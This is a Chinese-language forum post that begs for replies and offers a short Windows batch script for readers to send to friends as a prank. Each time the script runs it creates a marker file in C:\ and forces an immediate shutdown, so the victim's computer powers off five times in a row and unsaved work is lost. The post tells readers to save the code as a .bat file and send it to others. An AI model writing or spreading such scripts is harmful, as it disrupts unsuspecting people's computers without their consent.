可以用来整人 发给你的好友 求顶帖 我需要d8 如果我回帖回的多 我会送更多福利给大家 教程开始
打开记事本,新建一文档将下面的代码复制进去点另存为 bat格式ok教程结束 可以用虚拟机测试建议不要用自己电脑测试 可以用来整人
代码在下面记得回贴我·就不用文本附件了 记得回帖 我是新人需要d8
代码
copyright
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2